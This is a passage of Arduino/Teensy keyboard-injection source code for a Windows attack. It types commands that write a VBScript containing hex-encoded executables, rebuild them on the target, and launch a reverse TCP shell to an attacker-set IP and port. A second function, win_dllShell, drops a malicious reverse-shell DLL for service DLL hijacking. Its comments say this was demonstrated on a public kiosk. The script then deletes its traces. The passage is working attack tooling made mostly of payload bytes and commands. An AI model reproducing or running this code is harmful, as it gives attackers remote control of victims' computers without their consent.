17 70 17 64 16 ec ed c2 fe 08 61 0f c9 ff e0 3f 0f 67 ")); Keyboard.print(F("bc 6c e4 fc 60 90 4f 00 30 95 34 7b 18 bf 86 52 2f 65 97 13 30 29 0b 3c 33 da 60 3c 9d 16 11 08 88 40 06 58 f7 8e 17 01 8b 0d 4c 33 85 c9 74 31 12 29 42 73 53 f6 1d ")); Keyboard.print(F("2a 2b 37 42 09 27 32 76 f6 c3 db 3a c9 c3 b8 78 eb a7 90 07 e2 8b 81 7c dd 00 51 31 25 48 4b c8 d9 db 2c 83 48 8d 76 00 43 e7 ae 74 6a 8d fe 22 09 01 3a 18 f6 9c e3 ")); Keyboard.print(F("\" > ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); Keyboard.print(F("echo hexstr = hexstr ^& \"0c 00 20 ca 07 28 ef 8d 9b 5e d8 9a 0c e4 03 74 04 3f 16 8b 55 e6 18 8d 18 85 54 7d c9 b1 c9 70 ad 71 38 54 b8 5f 7c 3d 5b b1 ef 6e c9 cf 34 3d 40 fd 02 74 0a c7 05 ")); Keyboard.print(F("08 46 ec 5b 73 23 47 0e 12 48 74 3f 30 b1 bf db 0b 6d 34 67 bb 14 70 1f 81 fb 05 74 e4 9e ed ea 76 43 8b 03 b3 02 02 c3 04 15 75 ed 6f 48 5b c2 31 5c 10 e9 16 95 5c ")); Keyboard.print(F("23 60 89 ac 7f 0c b6 b4 fd cf bc 87 9c 9c 58 89 c2 35 20 20 c7 9d 0a dc dc c6 fb 9d 31 d0 a9 0b aa a4 34 24 0f a2 8d 5b cc 7d b6 98 0b 5c 0e f6 c6 ca f6 21 5b f7 07 ")); Keyboard.print(F("83 0d 34 ac 01 0b 80 02 f7 c2 1d 9b ec 39 ec 80 00 0e 04 00 29 08 0e 43 9a 0f 19 02 10 81 e2 04 db c3 9f ec 20 f6 c1 29 40 80 e5 20 75 30 7b 80 6b 3d 1f 7b f7 7e 06 ")); Keyboard.print(F("76 1e 79 0d 85 d2 78 23 38 40 74 0b 81 38 73 1f 62 2c 2e 90 5b c7 0e 80 b6 db 05 7b b0 c4 1a 33 eb d1 df db e3 e7 0b b3 de 70 56 70 10 8d 75 0c 89 34 40 9a f5 81 c2 ")); Keyboard.print(F("89 5c c1 57 17 00 3e a1 fd 8c 41 34 68 29 0a fc 89 74 1b 34 ba 6f b0 dc 1a ce 04 04 0c 4b 57 f8 6f dc fa 4c 4c eb 89 d6 a7 75 0b 8d 65 f4 5b 5e 5f 6c 01 f7 c5 33 4f ")); Keyboard.print(F("1c 47 65 c8 37 05 4a 0f 1c 89 4d 34 0b 6f a8 46 58 68 0b 48 8b 0c 4b 88 8c dc f1 85 b6 15 e5 c6 74 04 04 6f 8d 55 e4 36 63 6c cc 2e 8b 40 1b d4 39 42 73 6e b0 b7 8d ")); Keyboard.print(F("89 55 c0 41 4c be 36 42 dc 42 c3 bd 89 df f3 a4 3d 65 fe 84 40 1d b6 67 da 51 7b d9 41 1e e4 f1 63 d8 b0 84 40 3a a4 47 31 0c c3 5e 3e 0d 03 20 1f f6 a4 7b b3 fb 80 ")); Keyboard.print(F("05 4c e3 2c a1 38 c1 36 3a 0c 4b 67 0a 55 2c 3f b7 fd f0 1a a8 13 2d b8 14 31 08 2d 04 f8 fd d9 b7 86 07 7e dd bb 09 0b 7e 61 8b 3d 0a 85 ff 2d 14 f8 5e 1b 8b 35 18 ")); Keyboard.print(F("09 f6 53 a3 fb 0a 5c 30 fc 14 73 b6 be c0 20 7d e0 e4 ef d7 ed 17 72 f0 8b 10 03 13 e3 e0 b9 e2 89 fa 7b 75 d8 b3 85 98 9a 08 2a 72 dd 74 90 6c ee 85 b7 14 1c 46 6c ")); Keyboard.print(F("13 bb 20 08 0f 13 c0 d6 e4 6e 0c 75 ae 41 6e a7 06 08 c3 27 9b fb ea 85 02 93 3c 0c 0f 83 4a 15 ed b7 6d 5f b8 6b 03 26 8b 88 b1 0a 8b 53 5b c1 f2 f6 dd e2 ff 6b 83 ")); Keyboard.print(F("fa 10 74 46 04 20 74 79 08 61 e1 5d a2 01 2c e4 00 81 44 04 06 8d c7 3f a4 e8 90 0f b6 38 f7 c7 56 0b c3 3f f6 ee 81 cf 00 50 29 cf 81 ef bf 34 37 89 75 e4 eb 2c f3 ")); Keyboard.print(F("df b7 1f 6e 0f b7 23 7b 75 61 1d 89 f9 81 e9 1f 01 b8 79 be 85 f1 b6 e4 64 61 23 75 2b b9 fb 76 cc 70 33 ec e5 eb 1c fa 29 ca 81 ea 2c 1b 16 59 18 f2 02 e4 1d c6 7b ")); Keyboard.print(F("02 3f 82 5c 39 d8 0f 87 38 b7 06 8e 6b ec 75 24 9d 84 00 b9 33 56 20 49 77 98 c5 fa c3 b4 e5 1e dc 41 9f 48 21 fe ca 1a 47 30 b6 71 ac 35 0f 8d 50 a2 15 18 40 e1 c3 ")); Keyboard.print(F("8a f1 49 e9 c3 9b 1d a4 1b ce ef 85 1b bc fb ff 74 22 3e 74 0c f7 ff 14 9d 11 63 1d 7b e0 4b 75 f6 70 18 5e 02 98 6d c3 78 7f e9 06 fb eb 02 0e 8d 43 01 8b 14 85 24 ")); Keyboard.print(F("b1 30 0c 6e 9d f0 eb c8 1b bd 3c e0 cd 58 e0 45 d2 04 3f 0d 8e 14 81 47 0c eb 93 90 3f 9b a1 44 b5 c2 c6 31 6a 75 07 9c f8 f5 29 7b db 13 d8 65 48 50 b5 54 51 8d 60 ")); Keyboard.print(F("1d 88 df 07 63 61 2a fb 03 d6 5c 52 89 c6 07 64 f0 42 73 74 34 0c 62 67 e8 89 34 24 1d b0 0e 76 42 5b 08 f1 d7 40 6c 50 d6 61 cb 82 54 df 6e 08 e3 de e4 c9 f1 8b 5d ")); Keyboard.print(F("fc 63 07 0c 9c c0 57 43 fb 36 14 d3 30 37 05 03 f6 4e 76 d8 ab 89 43 59 94 50 a1 93 14 b7 03 8b b5 1c 9c 6e 53 54 eb a9 b0 87 70 16 18 a2 4f 5d 08 72 26 cc 10 e4 09 ")); Keyboard.print(F("0b e3 15 97 0a 37 46 d2 8e 8b 02 f8 3b eb 42 d6 bd c0 6f eb 08 39 d9 74 1e 9e 8b 42 08 37 f1 62 81 ed 61 07 52 b7 8b 48 80 4a db ac 3b 61 07 0b 1c 22 eb db 38 a3 a5 ")); Keyboard.print(F("81 61 30 7b d0 eb dd fb ab 71 0c 76 3b 78 3e 72 14 b2 75 05 2b 08 e8 9d 1a 63 b1 c3 1f 0e aa 48 11 3e 60 ef 15 ac 08 00 58 74 50 eb d0 62 cd 0e d6 bb cd 74 13 23 10 ")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); Keyboard.print(F("echo hexstr = hexstr ^& \"1b db 84 cd 44 d7 7c 85 de 3b 25 64 90 ae 81 e4 74 90 07 ec e8 20 27 07 19 f4 00 61 18 83 0c 32 c8 14 1c 04 0c 0d 36 c8 20 10 d0 3f b8 32 c8 20 83 07 c0 c4 dc c8 20 ")); Keyboard.print(F("83 0c d8 b4 d4 20 83 0c 32 bc cc b0 df c7 84 c8 c8 2f e8 b8 d2 13 7c 78 22 18 f4 f6 90 dd 88 1b 02 2c f6 26 1c 0b 08 00 9b ea 1e 02 fc e8 89 05 60 a5 d2 64 8b 1b 94 ")); Keyboard.print(F("ed 8b 52 30 02 0c 41 72 28 6b fe ff 0b 7c 4a 26 31 ff f9 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 e0 06 6f d4 1d 1b 42 3c 01 f9 40 78 2f d0 60 6b 91 4a 08 50 ")); Keyboard.print(F("15 e6 58 20 01 ff 63 b1 ff d3 e3 3c 49 8b 34 8b 01 d6 35 2f 38 e0 75 f4 03 7d f8 3b 7d 97 ed cb f6 24 75 e2 58 23 24 66 8b 0c 4b 08 1c 8b 04 ff ff 5d 6c 29 d0 40 24 ")); Keyboard.print(F("5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 06 fe ff ed 68 33 32 8e 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 eb d7 6d bf c4 29 c4 04 68 29 80 6b 00 0f 50 00 ")); Keyboard.print(F("40 01 6f f1 bf 7d 68 ea 0f df e0 0e 97 6a 05 68 ")); Keyboard.print(F(iphex)); // remote ip Keyboard.print(F(" 68 9c ")); Keyboard.print(F(porthex)); // remote port Keyboard.print(F(" 89 dd b5 42 ff e6 6a 10 56 57 68 99 a5 0d 19 9f 0c ff 4e de 7d fb 0b 0e ec 68 f0 b5 a2 56 0f ")); Keyboard.print(F("6a 00 6a 04 1c 02 d9 c8 5f 6f 5b ab df 0c 8b 36 6a 40 68 1e 59 56 16 68 58 a4 c3 5a b4 db 53 e5 12 93 53 0a 1f 20 23 61 2b f1 01 c3 29 c6 ea 3c c3 31 0d 44 60 61 00 ")); Keyboard.print(F("8f 9a b4 aa 2a 0b 02 9f 00 47 11 91 8c 6c ff ff ff ff 69 62 67 63 63 5f 73 5f 64 77 32 2d 31 2e 64 6c 6c 00 5f 5f 72 65 67 69 73 74 65 72 5f 66 72 61 3f db ce fe 6d ")); Keyboard.print(F("65 5f 69 6e 66 6f 28 6a 22 32 23 4a 76 5f 52 c0 76 ff 60 25 43 6c 61 73 73 65 73 37 64 65 39 fe db 56 3c 00 e0 cd 4d 0a 67 77 20 72 75 6e 74 69 fb ff db df 17 20 66 ")); Keyboard.print(F("61 69 6c 75 2b 3a 0a 00 20 20 56 69 72 74 75 61 6c 51 75 35 76 f9 76 6c 79 18 65 64 06 6f 72 20 25 62 79 4a b7 b5 76 fb 73 20 61 74 02 64 64 2d 64 13 70 b3 df de fe ")); Keyboard.print(F("b7 33 55 6e 6b 6e 6f 77 6e 20 70 77 75 64 6f 56 65 6c 6f 63 6d df ee 6e 26 69 6f 11 72 6f 74 0b 6f 6c 20 76 4e 73 b5 43 d9 ed 10 46 2e 0a 33 62 69 61 55 95 0d b9 2b ")); Keyboard.print(F("7a 65 00 83 a8 48 46 c0 7f 7b b0 14 07 01 7a 52 03 7c 08 01 1b 0c 04 04 88 be a1 70 4b 70 20 13 ab 9c d2 ff ff 8b 4c 76 ff ff 20 41 0e 08 85 02 42 0d 05 02 78 0a c5 ")); Keyboard.print(F("23 41 0b 0e 64 db 01 f5 04 d3 23 43 75 11 e6 80 c6 22 44 31 5f 1d 48 f7 bd 5b 03 0c 3b 1e 5a 96 47 d9 ec 3a 33 3b cc da 19 55 b6 e4 40 55 00 aa 2a 19 55 46 55 95 8c ")); Keyboard.print(F("d9 03 0a 4a f8 62 11 cb 46 76 1b 00 44 63 11 00 4d d3 34 db 24 61 03 3c 54 62 72 86 34 4d d3 34 98 b4 cc ea f8 4d d7 0d d6 0a 5b 1a 07 2a 03 3a 48 34 4d d3 34 5a 64 ")); Keyboard.print(F("6c 76 82 d3 34 4d d3 8a 94 9e a6 b0 36 a0 2c 58 ba 3f 73 00 50 d8 04 44 60 03 5b 91 1d b2 00 14 60 03 00 81 8c aa 2a 9b 00 46 15 9f ac 13 54 55 19 10 bf bf a0 aa 2c ")); Keyboard.print(F("00 19 80 40 00 05 17 88 ba 1c 03 20 44 04 70 ca 42 55 95 03 00 76 15 ab a8 be b0 50 fe ff 97 20 63 44 65 6c 65 74 65 43 72 69 74 69 63 61 6c 53 65 63 02 ba 99 80 1a ")); Keyboard.print(F("16 45 6e a0 6f 53 66 e1 15 78 10 50 72 6f 63 b6 bf 6d 25 93 0c 47 37 4c 61 73 74 45 72 10 72 b1 ed db c7 0d 4d 6f 64 75 4c 48 61 6e 64 05 41 11 dd 22 01 7d 2b 41 c3 ")); Keyboard.print(F("0f 49 6e ca 4a 40 cd 4d 4c 70 57 d8 b7 95 7d 4c 65 61 76 15 08 74 55 6e 68 4e 80 fb db da 64 79 74 70 16 46 69 6c 99 da ad bb 01 57 6c 73 60 56 2e 75 65 0c cc 75 b3 ")); Keyboard.print(F("80 4b 6e 74 3c 0f ba ed 05 94 5b e3 6d eb e4 db f7 df 7e 5f 5f 67 32 6d 61 69 6e 61 72 67 73 0e 70 02 65 6f 3b f6 da 6e 76 2c 6d 0d 66 6d c3 65 0b ae bd b7 b7 73 28 ")); Keyboard.print(F("5f 61 70 11 74 79 70 0f 7c f9 05 6b 6e 73 07 80 62 05 2e 0e d9 ae f0 cc 25 30 61 62 03 10 61 74 18 ed da d6 ba c5 6c f9 07 66 f9 1c 66 77 b4 b7 ed ce d9 07 73 69 67 ")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); Keyboard.print(F("echo hexstr = hexstr ^& \"79 6c 07 76 66 70 10 fc b7 27 2c 5f 66 89 50 45 03 4c 01 08 00 74 ae 13 53 17 d5 ff 21 9d e0 00 0f 03 0b 01 02 16 00 2e 75 17 aa 5c 1a 03 81 6c 12 07 10 43 84 21 c2 ")); Keyboard.print(F("03 7e 7f 95 0b c2 3d 0b 17 f8 3b 84 08 13 15 00 90 0c 6f 36 b6 3d ab 07 15 03 10 20 2b 04 3a 66 c9 62 07 06 00 0a 50 b6 5d 90 cd 28 00 80 02 18 13 8d ac eb 46 00 b0 ")); Keyboard.print(F("57 74 14 22 3e c3 80 00 2e 2b 1f b8 08 11 ef 39 2e 90 eb c5 d7 2d 7c 5b 42 30 60 2e 64 55 61 0b 50 e4 09 73 54 bd fb 8d c0 90 ef ec 0f 0d 60 c0 2e 72 28 14 27 30 a0 ")); Keyboard.print(F("9f b0 43 33 27 30 40 2e 65 68 22 66 b3 8f a5 d4 10 27 73 1c 58 30 72 27 62 b4 00 1b b6 b0 af 78 04 50 1f 00 fa a7 08 93 6d 30 77 69 43 56 de cf 85 7d c3 16 27 40 43 ")); Keyboard.print(F("52 54 0b f0 1c 41 11 2b cf 77 c4 8e 05 ec db 00 27 74 6c 77 e2 b9 aa 22 e6 19 27 d8 0b 98 23 f6 00 27 1b 00 00 68 bb 00 8a 81 03 24 00 00 00 ff 00 00 00 00 00 00 00 ")); Keyboard.print(F("60 be 15 a0 40 00 8d be eb 6f ff ff 57 83 cd ff eb 10 90 90 90 90 90 90 8a 06 46 88 07 47 01 db 75 07 8b 1e 83 ee fc 11 db 72 ed b8 01 00 00 00 01 db 75 07 8b 1e 83 ")); Keyboard.print(F("ee fc 11 db 11 c0 01 db 73 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 31 c9 83 e8 03 72 0d c1 e0 08 8a 06 46 83 f0 ff 74 74 89 c5 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 ")); Keyboard.print(F("db 75 07 8b 1e 83 ee fc 11 db 11 c9 75 20 41 01 db 75 07 8b 1e 83 ee fc 11 db 11 c9 01 db 73 ef 75 09 8b 1e 83 ee fc 11 db 73 e4 83 c1 02 81 fd 00 f3 ff ff 83 d1 01 ")); Keyboard.print(F("8d 14 2f 83 fd fc 76 0f 8a 02 42 88 07 47 49 75 f7 e9 63 ff ff ff 90 8b 02 83 c2 04 89 07 83 c7 04 83 e9 04 77 f1 01 cf e9 4c ff ff ff 5e 89 f7 b9 46 00 00 00 8a 07 ")); Keyboard.print(F("47 2c e8 3c 01 77 f7 80 3f 01 75 f2 8b 07 8a 5f 04 66 c1 e8 08 c1 c0 10 86 c4 29 f8 80 eb e8 01 f0 89 07 83 c7 05 88 d8 e2 d9 8d be 00 80 00 00 8b 07 09 c0 74 3c 8b ")); Keyboard.print(F("5f 04 8d 84 30 00 a0 00 00 01 f3 50 83 c7 08 ff 96 3c a0 00 00 95 8a 07 47 08 c0 74 dc 89 f9 57 48 f2 ae 55 ff 96 40 a0 00 00 09 c0 74 07 89 03 83 c3 04 eb e1 ff 96 ")); Keyboard.print(F("50 a0 00 00 8b ae 44 a0 00 00 8d be 00 f0 ff ff bb 00 10 00 00 50 54 6a 04 53 57 ff d5 8d 87 9f 01 00 00 80 20 7f 80 60 28 7f 58 50 54 50 53 57 ff d5 58 8d 9e 00 f0 ")); Keyboard.print(F("ff ff 8d bb 69 ad 00 00 57 31 c0 aa 59 49 50 6a 01 53 ff d1 61 8d 44 24 80 6a 00 39 c4 75 fa 83 ec 80 e9 04 65 ff ff eb 1a 56 be 04 70 40 00 fc ad 85 c0 74 0d 6a 03 ")); Keyboard.print(F("59 ff 74 24 10 e2 fa ff d0 eb ee 5e c2 0c 00 00 a0 ad 40 00 a3 ad 40 00 20 50 40 00 a4 ad 40 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ad 40 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b0 00 00 3c b0 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 6d b0 00 00 58 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b0 00 00 86 b0 00 00 96 b0 00 00 a6 b0 00 00 b4 b0 00 00 c2 b0 00 00 ")); Keyboard.print(F("00 00 00 00 d0 b0 00 00 00 00 00 00 4b 45 52 4e 45 4c 33 32 2e 44 4c 4c 00 6d 73 76 63 72 74 2e 64 6c 6c 00 00 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 00 47 65 74 ")); Keyboard.print(F("50 72 6f 63 41 64 64 72 65 73 73 00 00 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 00 00 56 69 72 74 75 61 6c 41 6c 6c 6f 63 00 00 56 69 72 74 75 61 6c 46 72 65 65 00 ")); Keyboard.print(F("00 00 45 78 69 74 50 72 6f 63 65 73 73 00 00 00 5f 69 6f 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); Keyboard.print(F("echo hexstr = hexstr ^& \"00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")); Keyboard.print(F("\" >> ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); // split the hex string into an array, rebuild into a binary executable Keyboard.print(F("echo hexarr = Split(hexstr) : ")); Keyboard.print(F("ReDim binarr(Ubound(hexarr)) : ")); Keyboard.print(F("For i = 0 To Ubound(hexarr) : ")); Keyboard.print(F("binarr(i) = Chr(CInt(\"&h\" ^& hexarr(i))) : ")); Keyboard.print(F("Next : ")); Keyboard.print(F("binstr = Join(binarr, \"\") : ")); Keyboard.print(F("Set objFSO=CreateObject(\"Scripting.FileSystemObject\") : ")); // write the created executable to file Keyboard.print(F("outFile=\"")); Keyboard.print(F(win_local_target_folder)); Keyboard.print(F(win_vbscript_file_name)); Keyboard.print(F("\" : Set objFile = objFSO.CreateTextFile(outFile,True) : ")); Keyboard.print(F("objFile.Write binstr : ")); Keyboard.print("objFile.Close >> "); Keyboard.print(F(win_local_target_folder)); Keyboard.println(filename); // run the vbscript to create the exe delay(400); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(F(filename)); if (fromcmd) { // not using a scheduled task, run the reverse shell exe from cmd window delay(2000); Keyboard.print(F("start /B ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(win_vbscript_file_name); delay(2000); Keyboard.println("cls"); } // delete vbs file win_deleteFile(win_local_target_folder, filename); win_closeWindow(); delete(iphex); delete(porthex); } /** This function is currently not used in the sample OS script This was a recent addition to the Teensy sketch which I used to demonstrate service dll hijacking on a public kiosk It currently does not rely on any file transfer and creates the reverse tcp shell DLL via the cmd line using your pre-defined remote IP/port There are two additional function-specific parameters that must be set (dll file name and dll target folder) as these are going to vary. You may choose to move these to the global vars All this function does is drop the DLL in the designated folder; you can then call win_restartWS() to reboot the machine (if targeting auto-start service + DLL hijack) **/ void win_dllShell(void) { delay(1000); win_openCmd(); makeIPHex("vbscript"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' char *iphex = makeIPHex("vbscript"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' char *porthex = makePortHex("vbscript", "tcp32"); // converts ip address into hex; boolean arg true = space delimeter instead of '\x' const char *filename = "dllshell.vbs"; // name of the temporary vb script file to write to target machine const char *win_dll_file_name = "test.dll"; // name of malicious dll file to create const char *win_dll_target_folder = "C:\\temp\\"; // location to place malicious dll file delay(1000); Keyboard.print(F("echo hexstr = \"4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 ")); Keyboard.print(F("4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 1a 42 c0 3d 7b 2c 93 3d 7b 2c 93 3d 7b 2c 93 e0 84 e7 93 3e 7b ")); Keyboard.print(F("2c 93 3d 7b 2d 93 35 7b 2c 93 30 29 cc 93 3c 7b 2c 93 30 29 f2 93 3c 7b 2c 93 52 69 63 68 3d 7b 2c 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a0 0b 0d 53 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 e0 00 02 21 0b 01 0c 00 00 10 00 00 00 10 00 00 00 50 00 00 90 63 00 00 00 60 00 00 00 70 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 10 00 00 00 00 00 00 ")); Keyboard.print(F("02 00 40 05 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 70 00 00 0c 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 50 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 00 00 00 60 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 70 00 00 00 02 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ")); Keyboard.print(F("00 00 00 00 00 00 00 00 00 00 00 00 33 2e 30 38 00 55 50 58 21 0d 09 02 04 b9 59 3e b9 24 7a 1b 1f 41 42 00 00 83 03 00 00 00 14 00 00 26 00 00 54 07 33 ff ff 55 8b ec 83 ec 08 8b 45 08 89 45 f8 c7 45 fc 00 06 eb 09 ed f6 df ")); Keyboard.print(F("fe 8b 4d fc 83 c1 01 89 05 8b 55 fc 3b 55 0c 73 11 26 f8 c6 18 09 fb 8f 6c 16 f8 f8 eb de 8b e5 5d c3 cc 00 de fe b7 77 4f 81 ec 24 03 25 6a 44 8d 45 a8 50 e8 9c ff 00 83 c4 08 ac fb df dc 53 a8 44 8d 4d ec 51 8d 55 a8 52 6a ")); Keyboard.print(F("00 01 44 05 fb b7 dd 76 00 68 16 28 06 ff 15 07 10 0c 85 c0 0f 84 88 83 1b 6b 5b fb 85 dc fc 38 46 01 32 09 50 74 b3 bb 3d 76 f0 51 22 10 6a 40 31 10 00 36 08 00 f7 6d 63 37 9a ec 52 17 18 c0 fc 4c 08 1a ee a4 6b ed 00 20 18 ")); Keyboard.print(F("0e 34 ec 1c c1 6c 3b b2 f6 89 95 94 fd 48 4e 14 19 f0 40 96 6c 6c c3 04 f0 50 09 00 37 97 6e eb 92 1d 04 e8 df 51 28 0c 6c d8 b9 bb ff 83 7d fc 01 74 02 eb 05 e8 ae 4c b8 01 05 24 c2 0c 19 55 55 76 3a 00 95 8c aa 2a 88 48 46 ")); Keyboard.print(F("55 b6 ff ee 81 fc e8 89 05 60 89 e5 31 d2 64 8b 52 30 02 0c ff ff ff 5f 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 ff db ff 6f 1d 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 08 50 8b 48 18 ")); Keyboard.print(F("8b 58 20 01 d3 ff c7 62 ff e3 3c 49 8b 34 8b 01 d6 35 2f 38 e0 75 f4 03 7d f8 3b 7d 24 2e db 97 ed 75 e2 58 23 24 66 8b 0c 4b 08 1c 8b 04 f0 ff ff df 29 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 ")); Keyboard.print(F("\" > ")); Keyboard.print(F(win_local_target_folder)); // location where script will be saved/run Keyboard.println(filename); delay(1000); Keyboard.print(F("echo hexstr = hexstr ^& \"6f ff ff 12 c0 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 11 29 c4 54 f6 5d b7 fd 50 68 29 80 6b 00 0f 50 00 40 01 68 ea 0f df e0 0e 6f ff ff ff 89 c7 68 ")); Keyboard.print(F(iphex)); // remote ip Keyboard.print(F(" 68 02 00 ")); Keyboard.print(F(porthex)); // remote port Keyboard.print(F(" 89 e6 6a 10 56 57 68 99 a5 74 61 18 68 63 ")); Keyboard.print(F("6d b7 f6 7f fb 64 00 89 e3 57 00 31 f6 6a 12 59 56 e2 fd 66 c7 70 ba 01 8d df de b6 6f 05 10 c6 00 44 50 56 00 46 56 4e 04 53 56 68 79 be fc b7 ee cc 3f 86 4b e0 0d 46 ff 30 68 08 87 1d 60 bb f0 b5 a2 ff ed 6f df 19 a6 95 bd ")); Keyboard.print(F("9d 0b 3c 06 7c 0a 80 fb cf 05 bb 47 13 72 6f 6a 00 88 6c 24 b4 53 12 49 00 be c4 bf a0 72 75 6e 64 6c 6c 74 2e 65 78 65 54 55 d9 c8 1b 00 32 aa aa 64 f6 1d 40 55 